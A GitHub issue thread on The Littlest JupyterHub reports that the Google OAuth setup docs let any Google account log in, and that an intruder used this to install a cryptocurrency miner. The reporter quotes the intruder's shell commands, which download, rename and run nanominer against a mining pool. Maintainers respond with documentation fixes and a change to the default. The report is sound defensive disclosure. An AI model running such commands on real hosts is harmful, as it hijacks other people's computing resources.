The official instructions for Google Auth leave a TLJH installation vulnerable

[Bougakov]

Bug description

I have installed TLJH using the provided manual and enabled Google Auth. Recently, I've discovered that this auth method allows ANYONE with a Google account to access my installation. I found someone with an address [email protected] has managed to access it and install a cryptocurrency miner by running these commands in the terminal:

cat .bash_history 
lscpu
wget https://github.com/nanopool/nanominer/releases/download/v3.7.1/nanominer-linux-3.7.1.tar.gz && tar xvf nanominer-linux-3.7.1.tar.gz && chmod +x nanominer && mv nanominer dontkillme
./dontkillme -algo verushash -pool1 verushash.mine.zergpool.com:3300 -wallet TQ11YB4cti4EhwYkZkoYNwE9B7nkQvTJ86.$(echo $(shuf -i 1-999 -n 1)-TRXKU32CORE) -password c=TRX

Expected behaviour

The manual should be written in a way that the user by default ends up with only allowing a specific set of Google Accounts ([email protected], [email protected]) or Google Apps Domains (@example.com) whitelisted. There must be an explicit action taken by the user to extend the auth permissions to anyone with a Google Account.

Your personal set up

I am using the-littlest-jupyterhub.

tljh-config show
users:
  admin:
  - [email protected]
  - [email protected]
http:
  port: 8888
user_environment:
  default_app: jupyterlab
https:
  port: 8888
auth:
  GoogleOAuthenticator:
    client_id: censored.apps.googleusercontent.com
    client_secret: censored
    oauth_callback_url: https://python.example.com/hub/oauth_callback
  type: oauthenticator.google.GoogleOAuthenticator

I am using Ubuntu on a Digital Ocean droplet.

I am looking for advice on how to restrict access to only Google Workspace accounts from a list of particular domains. Thank you.

[welcome]

Thank you for opening your first issue in this project! Engagement like this is essential for open source projects! 🤗

If you haven't done so already, check out Jupyter's Code of Conduct. Also, please try to follow the issue template as it helps other other community members to contribute more effectively.

You can meet the other Jovyans by joining our Discourse forum. There is also an intro thread there where you can stop by and say Hi! 👋

Welcome to the Jupyter community! 🎉

[Bougakov]

I have figured out that I had to manually run this command:

set auth.GitHubOAuthenticator.allowed_users [email protected], [email protected]

To explicitly restrict access to only these accounts. The manual should be explicit about this - otherwise the security implication is overlooked.

[jrdnbradford]

@Bougakov, recently I've been going through the TLJH Google auth docs trying to figure out something similar: how to set up auth for just a few users like you need, and also how to set up Google Group-based auth. I'll be putting in a PR to add some instructions to the Authenticate using Google section of the TLJH docs. I will share here when I'm done.

[jrdnbradford]

@Bougakov see #898. The TLJH Google auth docs are now explicit about this and include extra information. It also looks like this default setup may change in the future.

[consideRatio]

In oauthenticator 16 and later, part of tljh 1.0.0 and later, the default is to not allow anyone unless configuration on who to allow is explicitly made.

From https://oauthenticator.readthedocs.io/en/latest/reference/changelog.html:

[All] If no configuration allows a user, then users are no longer allowed by default.